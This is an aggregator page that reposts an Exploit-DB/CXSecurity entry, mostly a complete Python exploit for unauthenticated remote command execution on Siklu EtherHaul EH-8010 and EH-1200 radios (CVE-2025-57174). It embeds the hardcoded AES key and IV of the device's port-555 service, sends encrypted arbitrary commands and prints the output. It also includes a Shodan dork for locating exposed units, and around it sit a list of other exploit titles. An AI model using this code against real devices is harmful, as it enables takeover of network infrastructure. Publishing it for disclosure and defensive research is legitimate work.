惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

G
GRAHAM CLULEY
V
V2EX
WordPress大学
WordPress大学
博客园 - Franky
Last Week in AI
Last Week in AI
博客园 - 司徒正美
有赞技术团队
有赞技术团队
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 【当耐特】
V
Visual Studio Blog
C
CERT Recently Published Vulnerability Notes
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Jina AI
Jina AI
Attack and Defense Labs
Attack and Defense Labs
腾讯CDC
The Hacker News
The Hacker News
Hugging Face - Blog
Hugging Face - Blog
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
J
Java Code Geeks
人人都是产品经理
人人都是产品经理
阮一峰的网络日志
阮一峰的网络日志
T
Tailwind CSS Blog
S
SegmentFault 最新的问题
大猫的无限游戏
大猫的无限游戏
小众软件
小众软件
A
Arctic Wolf
量子位
博客园 - 聂微东
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
N
News and Events Feed by Topic
雷峰网
雷峰网
博客园_首页
Google Online Security Blog
Google Online Security Blog
Spread Privacy
Spread Privacy
罗磊的独立博客
H
Hacker News: Front Page
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
月光博客
月光博客
TaoSecurity Blog
TaoSecurity Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
博客园 - 三生石上(FineUI控件)
宝玉的分享
宝玉的分享
IT之家
IT之家
The Cloudflare Blog
爱范儿
爱范儿
博客园 - 叶小钗
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Apple Machine Learning Research
Apple Machine Learning Research
酷 壳 – CoolShell
酷 壳 – CoolShell

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Siklu EtherHaul Series EH-8010 Remote Command Execution
2026-02-14 · via The Exploit Database - CXSecurity.com

Siklu EtherHaul Series EH-8010 Remote Command Execution

# Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57174 # Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/ #!/usr/bin/env python3 import argparse, socket, struct from Crypto.Cipher import AES PORT = 555 HDR_LEN = 0x90 IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72) KEY = bytes([ 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5, 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17, 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0, 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82 ]) def recv_exact(sock: socket.socket, n: int) -> bytes: out = bytearray() while len(out) < n: chunk = sock.recv(n - len(out)) if not chunk: raise ConnectionError('socket closed') out += chunk return bytes(out) def pad16_zero(b: bytes) -> bytes: r = len(b) & 0x0F return b if r == 0 else (b + b'\x00' * (16 - r)) def hdr_checksum(hdr: bytes) -> int: return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF def build_header(flag: int, msg: int, payload_len: int) -> bytes: hdr = bytearray(HDR_LEN) hdr[0] = flag & 0xFF hdr[1] = msg & 0xFF struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF) struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr)) return bytes(hdr) class RFPipeSession: def __init__(self, key: bytes, iv0: bytes): self.key = key self.send_iv = iv0 self.recv_iv = iv0 def enc_send(self, sock: socket.socket, data: bytes) -> None: cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv) ct = cipher.encrypt(data) self.send_iv = ct[-16:] sock.sendall(ct) def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes: if n_plain <= 0: return b'' n_padded = (n_plain + 15) & ~15 ct = recv_exact(sock, n_padded) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt[:n_plain] def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None: if len(hdr_plain) != HDR_LEN: raise ValueError('header must be 0x90 bytes') self.enc_send(sock, hdr_plain) def recv_header(self, sock: socket.socket) -> bytes: ct = recv_exact(sock, HDR_LEN) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt def connect_any(host: str, port: int) -> socket.socket: infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM) last_err = None for fam, st, proto, _, sa in infos: s = socket.socket(fam, st, proto) try: s.connect(sa) return s except Exception as e: last_err = e s.close() raise ConnectionError(f'connect failed: {last_err}') def main(): ap = argparse.ArgumentParser(description='rfpiped command client (msg 0x01)') ap.add_argument('target', help='IPv4/IPv6 address') ap.add_argument('command', help='command string (e.g., "mo-info system")') ap.add_argument('--nul', action='store_true', help='append NUL terminator to command') ap.add_argument('--recv', action='store_true', help='receive and print response') args = ap.parse_args() payload = args.command.encode('utf-8') if args.nul: payload += b'\x00' hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload)) sess = RFPipeSession(KEY, IV0) with connect_any(args.target, PORT) as s: sess.send_header(s, hdr_plain) if payload: sess.enc_send(s, pad16_zero(payload)) if args.recv: rh = sess.recv_header(s) flag = rh[0]; rmsg = rh[1] rlen = struct.unpack_from('<I', rh, 0x08)[0] print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}') if rmsg in (0x03, 0x05): return if rlen: body = sess.dec_recv(s, rlen) if body.endswith(b'\x00'): body = body[:-1] try: print(body.decode('utf-8', errors='replace')) except Exception: print(body.hex()) if __name__ == '__main__': main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}